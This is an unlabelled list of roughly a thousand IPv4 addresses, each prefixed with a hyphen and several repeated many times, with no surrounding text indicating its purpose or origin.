-201.0.116.58 -187.72.242.48 -189.41.242.38 -200.158.194.79 -189.91.227.28 -189.115.152.29 -186.212.40.209 -179.95.107.56 -179.83.53.109 -179.184.198.139 -115.134.194.123 -177.107.191.146 -219.95.156.247 -177.17.243.120 -175.139.40.103 -196.92.138.7 -196.92.138.7 -177.102.173.75 -54.206.50.229 -177.189.191.12 -189.114.1.154 -191.17.29.100 -191.54.81.76 -45.236.240.90 -201.9.90.30 -191.31.28.232 -78.30.52.242 -194.27.81.46 -191.35.89.233 -181.81.151.214 -191.248.122.53 -189.68.194.55 -179.217.39.76 -113.193.10.224 -179.105.221.99 -186.210.83.2 -117.213.38.97 -187.116.64.94 -181.171.104.125 -115.133.48.155 -186.250.92.156 -160.179.83.177 -177.96.160.149 -45.236.240.90 -201.184.86.178 -177.156.160.140 -45.236.240.90 -219.92.18.145 -179.191.239.115 -189.68.232.84 -121.122.122.14 -189.112.72.60 -186.214.218.192 -177.50.165.235 -181.213.36.102 -186.206.154.193 -187.180.123.187 -179.108.179.189 -187.58.35.222 -45.236.240.90 -177.16.203.74 -194.176.109.161 -195.201.75.127 -196.64.70.252 -200.146.248.32 -189.63.134.79 -150.230.67.41 -91.224.13.207 -183.88.214.182 -45.160.27.90 -83.167.42.150 -118.185.75.243 -103.51.74.24 -194.176.109.161 -194.176.109.167 -187.21.228.71 -186.208.253.141 -14.192.239.119 -194.27.81.46 -200.71.26.122 -175.142.62.48 -82.124.7.202 -200.201.189.148 -189.231.125.112 -189.154.23.46 -167.57.216.207 -179.228.93.83 -177.188.47.117 -181.24.128.215 -189.63.134.79 -177.157.65.124 -47.33.81.160 -200.155.126.218 -179.225.179.148 -45.236.240.90 -86.98.28.44 -143.244.114.151 -51.103.161.162 -186.86.49.200 -203.47.138.130 -183.88.214.182 -64.129.215.75 -64.129.215.74 -187.35.54.220 -179.26.146.141 -189.63.134.210 -179.186.138.252 -91.192.174.30 -201.40.25.113 -179.222.120.27 -117.241.216.18 -59.91.151.33 -177.50.172.124 -177.42.53.91 -64.129.215.73 -177.2.67.108 -191.205.124.15 -189.83.151.114 -95.61.31.250 -189.59.180.136 -179.93.232.38 -54.252.215.139 -83.110.98.93 -200.128.85.180 -45.160.27.90 -200.128.85.178 -200.128.85.179 -45.236.240.90 -202.62.224.180 -189.47.16.238 -110.173.177.247 -18.138.225.192 -177.207.18.42 -13.127.26.66 -13.126.241.236 -168.228.181.69 -41.96.58.174 -175.140.20.20 -179.83.41.215 -187.112.50.60 -191.31.1.213 -152.249.124.131 -186.207.88.209 -177.144.161.139 -183.88.214.182 -186.213.223.34 -65.0.180.205 -201.25.157.186 -189.20.200.98 -182.52.191.184 -66.232.104.106 -177.205.114.227 -103.144.61.54 -182.18.140.193 -181.89.134.187 -189.15.206.112 -218.111.229.88 -202.62.224.25 -45.236.240.90 -117.215.183.220 -186.210.31.106 -179.162.203.108 -183.88.214.182 -187.65.73.59 -20.75.4.201 -191.54.58.213 -54.154.252.133 -41.96.90.22 -191.254.7.108 -179.235.253.228 -177.139.81.62 -191.33.80.123 -177.17.134.237 -177.157.85.159 -191.13.180.114 -203.151.206.118 -118.101.24.199 -176.57.150.45 -93.62.252.55 -117.221.237.42 -179.180.12.7 -179.162.234.255 -186.229.183.189 -179.250.233.36 -187.7.74.6 -187.180.2.70 -177.74.79.213 -191.54.81.180 -103.95.13.183 -80.190.65.1 -41.96.35.168 -115.130.151.239 -45.236.240.90 -203.151.206.142 -146.12.194.35 -187.67.254.103 -146.12.193.27 -93.62.252.55 -200.185.231.99 -186.218.192.128 -187.113.35.42 -196.206.153.69 -191.35.132.248 -196.206.153.69 -81.215.63.123 -45.179.74.204 -41.142.80.148 -3.26.131.116 -189.32.144.33 -179.251.155.244 -177.42.114.168 -201.184.86.178 -45.160.26.178 -177.106.62.194 -175.145.88.10 -175.138.140.73 -124.13.155.155 -138.201.0.107 -189.58.165.196 -201.47.163.54 -179.95.83.165 -189.5.131.226 -189.5.146.74 -121.6.102.16 -191.19.149.211 -187.121.100.153 -66.232.104.106 -189.27.238.171 -200.186.56.195 -123.63.196.186 -177.94.85.178 -183.88.214.182 -187.32.188.204 -189.78.83.37 -45.236.240.90 -191.185.61.90 -83.110.98.45 -152.249.68.19 -121.122.124.161 -186.210.27.99 -41.96.229.211 -82.124.7.202 -66.146.127.4 -201.69.125.115 -12.10.25.13 -175.145.80.121 -93.62.252.55 -191.54.59.75 -66.146.127.4 -66.146.127.19 -211.24.85.145 -177.134.209.222 -191.250.1.162 -81.18.99.51 -66.146.127.19 -189.68.157.160 -45.236.240.90 -186.57.104.99 -179.178.122.167 -179.187.107.29 -189.27.220.56 -45.236.240.90 -59.93.162.144 -117.222.158.40 -187.64.142.230 -183.80.82.104 -115.131.14.235 -189.4.170.180 -140.82.199.96 -189.63.134.210 -168.228.181.90 -196.77.164.154 -175.138.88.30 -118.200.140.123 -195.57.11.18 -41.96.195.34 -83.150.39.131 -187.64.142.230 -179.95.169.189 -66.146.127.5 -177.50.185.124 -37.235.91.59 -189.26.165.231 -187.64.130.89 -171.22.25.127 -186.214.216.12 -200.146.198.75 -152.254.238.15 -186.241.215.248 -191.191.68.79 -45.236.240.90 -45.236.240.90 -187.183.223.216 -189.59.9.107 -191.54.129.243 -59.91.145.211 -107.22.63.139 -45.236.240.90 -177.98.168.23 -59.90.87.69 -191.34.109.215 -66.146.127.19 -183.88.214.182 -117.217.188.34 -177.96.163.64 -58.71.194.21 -177.52.212.181 -183.88.214.182 -189.206.226.10 -117.216.8.142 -191.250.208.163 -187.141.226.46 -175.139.210.235 -179.176.106.10 -177.62.181.119 -217.119.180.117 -45.236.240.90 -186.206.173.248 -95.49.142.51 -179.219.49.182 -45.179.72.244 -45.164.5.28 -177.18.18.235 -45.236.240.90 -209.235.239.137 -209.235.239.138 -83.4.102.209 -107.23.201.197 -186.49.41.227 -179.219.34.198 -45.236.240.90 -186.229.181.95 -177.97.23.130 -196.89.163.97 -2.50.168.196 -66.146.127.5 -177.221.240.92 -189.5.124.223 -61.3.195.129 -179.83.17.74 -177.22.36.233 -194.176.109.187 -124.120.86.24 -187.188.108.200 -177.42.117.38 -3.36.69.125 -209.235.239.138 -189.41.200.250 -177.21.12.33 -177.138.236.31 -183.88.214.182 -191.254.195.92 -66.146.127.4 -66.146.127.5 -177.16.96.21 -128.134.37.56 -182.160.26.133 -117.200.149.190 -196.89.178.125 -175.139.208.194 -42.189.38.104 -182.18.140.197 -117.217.177.108 -175.139.226.254 -202.62.224.25 -1.23.144.186 -180.180.194.60 -103.139.166.12 -183.88.214.182 -183.88.214.182 -219.92.24.65 -210.195.163.60 -183.88.214.182 -177.157.68.246 -117.221.11.21 -180.183.133.39 -115.133.86.10 -88.132.233.145 -201.95.193.173 -117.216.8.89 -59.92.192.99 -175.143.62.1 -59.91.151.88 -121.122.122.96 -59.92.108.243 -117.215.116.91 -124.13.239.193 -175.139.246.236 -117.197.206.66 -117.197.207.143 -117.221.240.173 -59.91.150.82 -117.200.150.55 -59.89.237.6 -61.0.120.88 -117.212.182.210 -117.241.40.209 -59.88.189.95 -223.30.224.242 -59.92.186.225 -117.216.44.156 -61.0.124.11 -59.91.145.225 -177.207.149.195 -117.212.186.203 -61.0.121.3 -117.217.166.115 -164.100.72.35 -179.83.19.205 -180.180.192.48 -189.61.126.164 -201.16.185.25 -191.54.62.154 -189.91.229.5 -72.249.184.251 -177.158.201.34 -186.57.120.118 -185.66.153.63 -179.251.149.251 -128.134.37.57 -189.26.237.109 -195.62.178.95 -160.179.87.144 -203.43.99.43 -20.85.19.122 -59.91.19.162 -179.159.148.10 -177.148.187.154 -177.195.249.208 -187.64.23.92 -179.182.10.2 -200.233.226.48 -115.131.28.201 -124.13.134.129 -168.228.182.125 -191.251.28.164 -177.63.208.24 -177.98.122.221 -191.31.170.176 -203.106.185.161 -177.68.115.145 -189.79.106.101 -173.212.11.45 -152.254.229.53 -183.88.214.182 -94.230.19.45 -189.59.98.203 -200.75.18.27 -179.43.117.222 -191.33.214.40 -18.138.235.54 -187.4.207.75 -179.208.70.187 -177.34.245.188 -185.179.142.133 -200.150.126.65 -117.213.79.34 -18.231.109.1 -175.139.26.22 -189.112.203.147 -115.133.17.79 -177.94.103.66 -45.236.240.90 -189.112.53.38 -45.236.240.90 -177.100.82.233 -3.25.180.114 -191.55.16.172 -54.206.99.177 -191.31.83.128 -179.254.36.131 -177.100.198.32 -103.242.69.82 -88.249.164.79 -177.43.156.225 -40.87.105.253 -191.55.192.133 -183.88.214.182 -66.97.41.240 -190.19.209.209 -187.36.16.84 -45.236.240.90 -196.46.63.202 -177.157.44.116 -185.66.153.68 -189.27.5.25 -45.236.240.90 -189.35.216.62 -35.165.88.248 -177.191.61.185 -189.44.67.140 -177.62.143.56 -181.30.8.146 -191.253.196.1 -189.112.223.46 -183.88.214.182 -45.236.240.90 -45.236.240.90 -183.88.214.182 -196.46.247.46 -45.236.240.90 -86.242.182.214 -45.236.240.90 -179.110.98.207 -192.234.241.46 -45.236.240.90 -77.75.102.53 -41.226.255.172 -45.236.240.90 -45.236.240.90 -147.50.132.81 -189.154.183.146 -187.114.178.229 -183.88.214.182 -45.236.240.90 -45.236.240.90 -185.106.243.175 -181.119.123.24 -183.88.214.182 -183.88.214.182 -45.236.240.90 -200.20.109.41 -183.88.214.182 -59.96.225.180 -183.88.214.182 -186.223.230.83 -201.95.64.25 -117.221.13.254 -183.88.214.182 -105.30.22.66 -45.236.240.90 -179.214.35.226 -187.65.38.15 -201.93.125.194 -183.88.214.182 -183.88.214.182 -131.0.203.242 -177.94.47.116 -45.184.68.155 -197.253.144.120 -83.4.162.25 -41.97.51.38 -45.236.240.90 -45.236.240.90 -183.88.214.182 -115.133.84.136 -183.88.214.182 -177.103.187.238 -191.31.7.114 -177.191.62.101 -187.57.41.109 -177.75.152.239 -91.92.214.9 -179.217.226.242 -191.248.36.155 -201.47.218.48 -191.189.134.166 -191.35.81.140 -183.88.214.182 -45.236.240.90 -177.40.120.35 -185.216.132.45 -115.130.151.66 -201.42.15.106 -183.88.214.182 -45.236.240.90 -183.88.214.182 -177.170.234.151 -177.102.5.136 -191.209.67.241 -200.175.60.221 -213.144.25.107 -116.202.11.74 -191.54.56.82 -189.63.42.210 -189.11.199.230 -202.88.238.212 -183.88.214.182 -65.132.102.4 -45.236.240.90 -177.191.43.187 -179.211.215.128 -82.137.255.129 -177.75.77.70 -213.153.177.18 -41.96.182.98 -181.121.0.40 -179.98.24.124 -186.248.165.5 -177.75.161.77 -173.212.11.45 -179.83.52.208 -189.210.92.68 -189.210.92.69 -83.4.174.82 -66.168.93.173 -212.244.58.231 -191.31.16.86 -201.92.136.246 -183.88.214.182 -183.88.214.182 -175.141.168.186 -183.88.214.182 -179.216.56.181 -191.35.80.220 -177.188.11.57 -183.88.214.182 -93.62.252.55 -191.33.192.66 -177.17.61.162 -183.88.214.182 -186.210.26.25 -179.104.167.186 -2.47.138.83 -45.236.240.90 -105.158.179.4 -177.98.166.33 -52.220.237.249 -121.122.101.239 -85.105.247.231 -191.35.254.38 -81.0.104.37 -138.59.12.96 -162.242.171.47 -45.236.240.225 -45.236.240.226 -45.236.240.224 -52.22.207.204 -113.193.10.224 -186.50.164.117 -183.88.214.182 -45.236.240.90 -177.158.200.26 -177.100.213.47 -189.8.101.246 -177.133.47.42 -189.112.148.102 -180.246.11.195 -107.20.233.115 -45.236.240.90 -45.236.240.227 -189.115.69.128 -83.4.91.23 -179.177.187.138 -191.255.57.207 -189.126.200.110 -177.62.181.138 -191.54.56.185 -20.56.3.150 -45.236.240.90 -177.157.74.114 -3.142.38.133 -209.235.239.137 -58.71.194.90 -105.155.188.115 -189.6.147.108 -115.133.72.109 -189.114.7.159 -45.236.240.90 -179.118.217.18 -179.235.136.128 -45.236.240.90 -177.156.69.143 -122.54.110.83 -66.232.104.106 -54.179.81.26 -183.88.214.182 -183.88.214.182 -191.254.7.108 -187.255.219.135 -189.30.141.87 -154.113.1.29 -201.26.143.103 -138.0.125.83 -62.94.251.226 -116.14.133.22 -45.236.240.90 -186.210.172.75 -179.219.34.167 -179.219.40.196 -187.74.121.198 -179.219.198.215 -183.88.214.182 -203.43.99.43 -115.133.72.6 -175.139.245.136 -187.57.7.119 -41.96.123.38 -177.134.161.161 -188.85.213.165 -192.140.42.189 -8.210.162.13 -179.232.231.202 -132.248.213.12 -13.213.81.10 -103.242.69.82 -191.255.124.43 -45.236.240.90 -45.236.240.90 -45.236.240.90 -191.191.217.10 -190.187.197.20 -187.36.21.196 -179.176.107.107 -179.182.131.65 -45.236.240.90 -182.75.237.106 -79.44.148.151 -189.27.22.132 -201.8.91.178 -177.215.80.196 -204.106.247.130 -191.255.57.252 -66.232.104.106 -189.41.245.220 -187.65.182.29 -196.201.233.43 -179.176.104.162 -187.114.172.89 -179.186.110.169 -179.181.218.106 -177.140.164.28 -20.72.117.146 -219.74.8.135 -170.231.45.167 -58.71.194.90 -189.26.184.194 -194.176.109.187 -191.190.67.63 -45.236.240.90 -81.196.101.50 -177.106.159.166 -187.67.212.101 -201.48.244.1 -186.210.54.212 -105.154.119.78 -177.183.232.39 -200.205.122.114 -200.201.146.234 -74.142.126.91 -189.41.203.214 -63.168.72.12 -177.106.164.161 -200.75.18.27 -191.248.121.80 -189.112.56.221 -83.4.175.83 -200.1.115.19 -186.210.111.28 -41.77.66.20 -45.236.240.90 -186.237.141.186 -189.41.246.47 -52.72.191.40 -54.232.39.164 -189.41.246.94 -201.16.185.75 -187.23.63.42 -186.236.100.63 -189.6.106.66 -186.55.27.221 -138.59.12.96 -191.251.194.50 -187.87.130.18 -62.15.183.105 -168.227.78.94 -177.40.117.80 -217.238.178.87 -46.170.51.102 -18.229.7.160 -177.30.100.247 -177.157.187.207 -177.182.206.87 -175.145.87.18 -189.154.121.93 -134.209.72.231 -177.64.142.215 -179.176.110.18 -191.30.225.89 -46.243.119.30 -191.31.23.0 -189.61.88.13 -200.155.0.108 -186.116.13.48 -177.94.241.206 -191.54.89.26 -187.58.72.78 -179.104.163.216 -187.11.126.90 -177.205.108.36 -189.6.187.51 -77.31.47.59 -179.126.127.0 -177.185.141.73 -179.124.11.101 -201.48.137.43 -113.172.89.61 -189.6.174.18 -23.20.188.45 -191.191.49.136 -200.158.88.113 -177.18.64.27 -41.140.163.236 -187.109.79.227 -203.106.119.215 -198.147.212.235 -89.31.148.170 -189.26.138.34 -179.181.222.118 -191.33.73.130 -170.238.137.71 -177.158.1.165 -160.178.161.9 -177.177.88.194 -179.181.240.68 -170.0.46.252 -68.15.59.118 -201.48.159.190 -197.165.163.87 -177.129.242.251 -179.83.20.63 -201.11.35.13 -200.179.23.43 -189.18.181.160 -179.179.157.239 -186.210.79.8 -199.15.152.210 -199.15.152.211 -191.249.127.213 -189.7.23.150 -98.128.253.227 -189.120.80.15 -177.129.90.20 -179.233.222.122 -74.62.86.166 -195.82.131.85 -35.190.150.220 -189.58.148.177 -189.63.41.193 -179.127.95.234 -35.238.169.20 -189.154.169.138 -138.36.1.131 -189.73.230.186 -202.164.153.164 -189.5.153.172 -138.121.17.240 -187.112.79.39 -183.88.214.182 -187.21.230.6 -83.99.48.158 -213.238.178.85 -196.64.88.236 -200.175.174.49 -179.220.6.176 -177.207.72.205 -189.68.7.92 -168.205.39.208 -186.251.21.218 -80.14.36.232 -150.136.200.66 -179.219.197.158 -91.224.13.253 -45.236.240.90 -177.182.207.29 -189.231.23.52 -186.210.49.133 -177.106.176.229 -88.151.18.147 -177.16.201.202 -177.153.8.152 -168.196.16.114 -186.223.225.118 -38.146.198.84 -179.185.49.99 -150.214.203.47 -186.57.91.130 -189.63.100.118 -115.135.119.131 -128.163.188.75 -115.133.248.142 -177.191.245.144 -187.103.248.190 -189.90.248.111 -186.192.143.135 -105.155.25.99 -94.140.123.129 -189.102.140.241 -189.6.220.84 -38.146.198.196 -201.47.157.105 -13.236.177.42 -177.80.87.36 -179.183.188.90 -186.213.227.68 -3.238.62.46 -189.201.249.248 -187.44.93.75 -189.115.65.10 -4.30.102.82 -58.185.97.236 -117.194.130.125 -34.194.166.221 -187.112.88.248 -103.124.92.147 -179.235.28.96 -179.162.52.205 -191.31.27.210 -34.225.114.254 -200.158.47.103 -179.219.120.134 -199.15.152.210 -181.81.144.255 -177.158.205.62 -191.250.76.216 -199.15.152.211 -189.91.224.226 -45.234.32.185 -203.106.118.107 -187.39.76.175 -179.110.205.125 -201.48.65.190 -103.211.56.71 -201.11.220.28 -131.255.81.162 -34.249.7.214 -113.173.117.31 -187.32.91.37 -121.169.55.134 -179.235.136.93 -74.142.126.91 -179.35.32.55 -191.251.25.25 -41.142.58.77 -176.221.91.98 -179.216.49.95 -4.30.102.81 -45.236.240.90 -177.18.143.199 -201.43.51.18 -189.110.80.105 -177.69.232.81 -177.6.247.203 -177.92.39.116 -179.95.85.103 -201.87.123.56 -117.202.72.48 -216.83.195.207 -187.32.161.48 -191.250.56.109 -177.205.126.164 -191.251.205.173 -189.112.171.78 -183.88.214.182 -54.228.3.216 -177.97.57.244 -190.52.167.121 -216.17.18.138 -60.54.46.185 -45.236.240.90 -91.75.76.138 -191.250.174.61 -191.254.68.234 -189.110.90.65 -187.72.243.52 -59.92.185.112 -177.127.60.239 -88.132.96.188 -190.113.60.5 -216.109.223.142 -179.98.202.113 -41.96.216.241 -54.217.171.116 -190.104.232.179 -103.228.35.252 -186.229.186.70 -177.98.251.157 -177.157.42.78 -213.81.173.234 -186.223.225.118 -210.195.161.157 -203.122.46.189 -45.236.240.90 -189.154.206.107 -177.70.123.107 -122.160.51.106 -189.115.89.227 -45.236.240.90 -181.177.232.15 -191.13.29.53 -177.94.84.8 -179.247.244.170 -179.176.97.247 -179.176.97.86 -179.225.168.176 -5.196.31.23 -45.164.5.39 -45.236.240.90 -179.191.239.187 -59.98.133.83 -189.18.180.227 -177.92.44.19 -183.88.62.108 -168.228.183.99 -201.27.141.215 -189.91.229.57 -154.113.80.65 -138.0.163.246 -186.218.195.199 -45.236.240.90 -186.216.161.30 -173.255.201.22 -177.118.172.188 -41.96.77.181 -179.216.61.215 -45.236.240.90 -59.88.191.177 -195.185.187.98 -79.175.171.9 -179.182.138.101 -201.52.231.63 -189.26.179.18 -177.99.69.175 -15.161.92.2 -3.7.68.35 -15.237.24.106 -34.217.81.227 -3.239.149.69 -18.223.102.239 -18.118.115.209 -13.51.193.197 -15.237.63.182 -18.229.123.112 -52.56.58.110 -54.250.191.73 -54.176.139.74 -59.88.183.83 -129.226.145.57 -217.128.24.254 -3.96.193.73 -54.250.102.189 -35.164.16.91 -3.239.216.144 -157.175.59.31 -18.130.85.190 -18.196.113.205 -18.229.126.5 -18.130.85.190 -18.134.130.16 -34.221.168.101 -15.237.45.112 -3.239.149.69 -3.65.18.128 -18.117.117.88 -54.153.0.62 -189.114.244.122 -191.176.144.72 -3.16.255.139 -18.203.73.51 -16.162.21.49 -201.13.164.73 -52.12.91.213 -3.67.44.249 -186.212.172.220 -191.31.2.109 -51.161.87.159 -157.175.54.120 -13.244.65.24 -3.108.238.230 -191.35.72.0 -187.74.80.243 -81.252.49.227 -186.66.93.131 -177.96.245.154 -45.236.240.90 -187.18.166.154 -45.236.240.90 -196.206.171.231 -201.55.174.227 -37.34.156.83 -180.183.247.168 -54.217.171.116 -154.113.80.65 -179.222.120.231 -171.22.25.127 -179.183.200.159 -181.177.232.16 -187.122.241.248 -213.144.25.78 -179.222.120.209 -103.95.13.182 -177.118.172.200 -189.5.125.179 -179.83.7.223 -45.164.5.16 -179.104.163.151 -179.176.108.248 -189.15.184.157 -96.85.229.180 -34.123.31.51 -135.196.144.54 -160.179.111.254 -187.56.95.38 -191.54.56.90 -200.233.133.35 -179.154.244.12 -157.175.58.218 -210.101.150.56 -202.137.3.246 -179.187.9.189 -177.156.223.238 -179.104.166.119 -179.104.39.194 -18.141.4.239 -188.218.78.83 -189.112.182.189 -191.254.175.72 -142.154.135.87 -189.46.188.16 -189.63.111.123 -189.27.117.35 -189.112.92.44 -69.168.112.5 -212.125.32.8 -177.158.20.44 -8.136.43.145 -179.232.238.51 -179.84.69.117 -45.162.68.29 -175.145.96.213 -152.254.238.88 -189.6.231.198 -179.104.166.215 -177.106.36.160 -189.63.133.154 -187.65.8.82 -187.18.187.48 -186.210.93.122 -216.83.195.207 -177.95.9.174 -59.89.193.28 -54.228.3.216 -177.96.149.217 -118.68.217.52 -200.49.38.2 -179.186.67.107 -179.180.170.25 -187.18.187.48 -177.92.117.6 -181.223.160.198 -175.137.17.82 -201.26.112.107 -69.168.112.3 -179.187.241.99 -69.168.112.2 -201.71.137.36 -179.95.74.245 -188.85.242.82 -187.107.163.181 -105.158.79.253 -115.130.18.107 -59.91.149.216 -189.47.74.225 -200.146.248.237 -179.83.51.91 -189.114.49.74 -179.55.88.234 -187.58.14.157 -186.57.99.236 -177.156.121.201 -189.34.242.153 -62.216.237.49 -191.54.58.101 -196.65.232.30 -93.46.35.37 -213.228.188.134 -179.233.23.147 -213.228.188.136 -213.228.188.135 -41.96.149.162 -115.130.146.158 -179.219.43.103 -179.180.237.209 -69.168.112.5 -69.168.112.3 -216.83.79.237 -179.83.3.165 -167.61.130.192 -189.114.202.127 -177.135.195.243 -81.252.49.227 -218.248.64.249 -78.96.45.29 -177.132.133.13 -177.133.42.117 -132.255.33.81 -189.5.156.48 -189.231.170.84 -45.236.240.90 -167.57.232.160 -177.18.138.242 -219.92.244.219 -179.153.62.169 -191.249.122.204 -181.121.0.40 -177.27.235.40 -189.78.90.153 -79.151.142.167 -183.88.214.182 -177.96.71.215 -45.236.240.90 -59.91.145.45 -179.108.56.18 -81.47.168.199 -117.247.185.219 -115.133.72.169 -177.42.141.163 -177.205.36.122 -83.4.173.219 -130.204.38.243 -175.139.247.101 -191.31.11.58 -179.181.67.5 -45.236.240.90 -194.176.109.132 -189.6.147.62 -118.129.173.133 -45.236.240.90 -65.2.40.174 -189.78.176.190 -59.99.133.197 -61.2.38.150 -74.142.126.91 -191.33.194.144 -177.54.57.162 -186.219.216.91 -177.30.79.81 -69.39.35.243 -81.5.113.114 -5.196.31.23 -41.140.238.91 -175.138.217.234 -201.62.109.213 -189.114.103.197 -124.120.86.187 -45.236.240.90 -177.133.77.97 -179.184.114.133 -81.209.242.10 -167.61.180.30 -83.4.95.139 -186.66.93.131 -177.127.62.46 -179.214.23.241 -179.219.108.220 -179.228.34.44 -118.221.170.7 -154.68.160.164 -123.108.201.214 -183.88.214.182 -103.88.122.201 -72.5.203.126 -189.125.61.7 -189.6.187.181 -194.176.109.132 -202.188.218.88 -177.82.250.161 -59.99.134.178 -191.178.151.62 -179.127.93.69 -177.149.132.134 -45.234.32.185 -45.234.32.185 -61.2.39.183 -189.112.73.1 -177.188.39.181 -81.5.113.97 -45.234.32.185 -189.29.55.210 -45.234.32.185 -109.202.21.82 -45.234.32.185 -45.236.240.90 -83.4.89.6 -45.234.32.185 -45.234.32.185 -45.234.32.185 -45.234.32.185 -81.21.196.102 -45.234.32.185 -45.234.32.185 -45.234.32.185 -191.35.250.137 -45.234.32.185 -179.232.238.51 -45.234.32.185 -83.110.99.77 -45.234.32.185 -45.234.32.185 -177.27.235.195 -202.164.184.34 -187.72.194.81 -45.234.32.185 -183.88.214.182 -45.234.32.185 -199.38.71.250 -45.234.32.185 -200.94.92.180 -45.234.32.185 -201.16.185.167 -45.234.32.185 -52.67.203.7 -45.234.32.185 -189.112.173.131 -45.234.32.185 -186.206.245.71 -45.234.32.185 -45.234.32.185 -177.96.70.45 -45.236.240.90 -143.208.212.177 -45.234.32.185 -45.234.32.185 -45.234.32.185 -45.234.32.185 -45.234.32.185 -45.234.32.185 -52.37.131.217 -45.234.32.185 -179.83.126.35 -69.168.112.5 -189.63.3.249 -213.153.177.18 -145.253.243.115 -145.253.243.116 -177.157.109.182 -41.96.206.45 -177.97.35.171 -45.234.32.185 -41.141.250.224 -192.140.102.174 -13.36.239.231 -13.244.135.194 -18.157.80.83 -3.36.108.201 -13.245.30.48 -15.161.231.102 -13.230.195.71 -13.230.195.71 -3.101.53.241 -157.175.47.19 -13.245.89.118 -13.53.126.89 -54.252.223.87 -18.192.114.254 -35.180.204.120 -52.214.133.123 -13.236.185.14 -15.237.82.189 -16.162.89.96 -52.27.113.49 -18.117.84.83 -13.245.87.77 -13.232.240.21 -52.15.210.228 -18.138.212.19 -18.231.123.223 -13.51.237.106 -3.134.247.28 -13.244.99.97 -13.208.244.46 -3.26.3.99 -15.161.245.201 -15.236.204.177 -13.53.127.214 -52.194.236.63 -18.188.59.5 -54.187.201.167 -15.188.88.234 -52.196.249.84 -15.222.249.184 -3.250.241.240 -18.133.184.244 -3.249.232.26 -34.218.244.63 -52.198.123.213 -15.161.245.130 -15.185.34.35 -3.134.247.28 -3.10.162.127 -13.208.245.185 -54.151.119.125 -18.228.59.216 -15.185.217.221 -35.178.178.59 -3.66.229.25 -13.245.30.119 -54.93.183.27 -45.234.32.185 -18.228.36.90 -13.251.124.184 -13.208.245.192 -16.162.88.31 -35.176.134.128 -54.248.155.184 -35.152.62.130 -63.34.162.166 -16.162.88.31 -15.161.132.102 -13.211.177.76 -35.164.204.75 -18.144.173.80 -15.236.141.205 -13.245.82.147 -54.202.193.214 -3.239.205.120 -54.151.1.217 -13.59.31.135 -3.17.147.188 -18.202.237.10 -3.36.133.2 -13.236.185.14 -13.51.64.63 -18.181.250.244 -13.208.53.41 -13.208.183.147 -15.160.26.4 -34.242.247.127 -18.229.137.209 -52.27.187.155 -52.79.112.85 -18.236.100.250 -3.67.86.45 -52.53.184.221 -3.36.133.2 -15.161.41.49 -18.222.25.110 -34.216.57.3 -13.245.157.75 -18.183.199.105 -3.96.159.66 -99.79.69.25 -79.187.197.188 -13.58.172.71 -18.132.73.11 -65.2.37.78 -35.158.132.199 -3.17.163.249 -52.47.172.39 -13.245.7.8 -13.124.196.110 -99.79.45.65 -18.140.249.52 -52.53.185.172 -52.67.43.199 -35.183.105.86 -3.96.134.84 -13.231.120.243 -15.237.149.123 -54.252.185.101 -3.249.232.26 -18.138.233.6 -186.213.144.185 -45.234.32.185 -83.240.242.186 -191.55.146.166 -186.212.68.191 -189.25.99.93 -45.234.32.185 -170.247.253.135 -115.133.48.164 -45.234.32.185 -201.182.186.98 -177.133.78.54 -45.234.32.185 -45.234.32.185 -45.234.2.197 -45.234.32.185 -45.234.32.185 -5.100.241.131 -177.22.36.233 -183.88.214.182 -45.234.32.185 -177.97.188.122 -79.188.177.61 -78.96.45.22 -54.209.82.14 -123.108.201.214 -177.235.44.219 -194.224.185.110 -177.16.199.183 -179.251.149.72 -115.135.241.177 -212.123.239.150 -85.121.32.222 -85.105.91.45 -45.179.72.227 -15.237.150.233 -179.222.122.84 -187.65.64.244 -177.43.155.159 -219.92.24.103 -175.139.130.236 -177.134.161.50 -123.252.255.153 -34.123.31.51 -181.43.77.89 -179.162.101.73 -179.155.157.104 -201.122.204.50 -201.20.82.181 -177.158.3.195 -177.92.44.211 -191.35.143.150 -72.10.210.122 -191.193.203.75 -191.249.126.1 -179.156.234.208 -186.215.73.84 -187.53.238.224 -186.50.208.211 -83.4.174.243 -177.148.188.47 -191.35.242.177 -3.239.60.228 -177.99.76.45 -152.171.91.71 -177.98.239.70 -190.64.83.162 -177.16.197.202 -191.23.43.39 -179.235.166.40 -186.212.135.57 -177.35.91.248 -157.100.226.217 -186.216.161.30 -118.221.170.7 -179.99.27.133 -186.213.83.66 -117.203.77.187 -177.17.118.103 -41.78.201.138 -69.168.112.3 -201.47.182.239 -179.162.106.45 -54.168.235.31 -94.187.238.110 -34.234.111.74 -59.96.225.168 -59.92.182.235 -189.26.169.105 -45.236.240.90 -85.25.26.251 -70.37.252.23 -187.35.34.64 -45.234.32.185 -45.234.32.185 -69.39.35.226 -177.96.51.32 -45.234.32.185 -200.98.162.228 -15.223.25.92 -45.234.32.185 -45.234.32.185 -191.190.69.76 -45.234.32.185 -45.234.32.185 -189.34.243.23 -45.234.32.185 -200.98.142.42 -45.234.32.185 -45.234.32.185 -45.234.32.185 -45.234.32.185 -200.196.247.79 -96.85.229.180 -45.234.32.185 -203.176.185.49 -45.234.32.185 -200.143.14.24 -41.142.79.183 -179.219.129.136 -45.234.32.185 -191.35.81.122 -45.234.32.185 -201.95.69.177 -3.26.14.143 -177.102.194.34 -45.234.32.185 -189.114.171.46 -45.234.32.185 -45.234.32.185 -45.234.32.185 -45.234.32.185 -45.234.32.185 -45.234.32.185 -45.234.32.185 -177.103.97.187 -191.54.133.118 -170.84.114.95 -45.234.32.185 -177.96.69.91 -45.234.32.185 -52.166.243.145 -189.154.209.165 -207.140.245.6 -194.156.152.139 -177.135.55.195 -179.181.216.194 -189.100.49.221 -186.227.0.23 -45.234.32.185 -45.234.32.185 -179.187.80.165 -45.234.32.185 -41.141.210.93 -45.234.32.185 -191.7.145.62 -186.210.24.63 -58.71.206.18 -45.234.32.185 -40.68.173.22 -45.236.240.90 -67.52.210.105 -183.88.214.182 -183.82.103.133 -189.91.224.205 -179.159.139.3 -45.234.32.185 -45.234.32.185 -104.40.153.112 -13.229.107.126 -191.187.123.223 -69.39.35.242 -177.96.48.169 -177.206.150.230 -150.107.43.143 -206.248.216.203 -45.236.240.90 -45.234.32.185 -177.157.85.212 -52.233.143.134 -45.234.32.185 -186.70.104.84 -45.234.32.185 -177.20.207.131 -45.234.32.185 -45.234.32.185 -189.58.165.225 -45.234.32.185 -3.12.241.51 -45.236.240.90 -186.207.248.190 -14.192.239.202 -45.234.32.185 -191.187.100.69 -115.135.125.137 -45.234.32.185 -3.237.174.198 -45.234.32.185 -189.76.191.175 -186.215.53.3 -177.182.172.104 -189.41.246.235 -45.234.32.185 -20.198.121.4 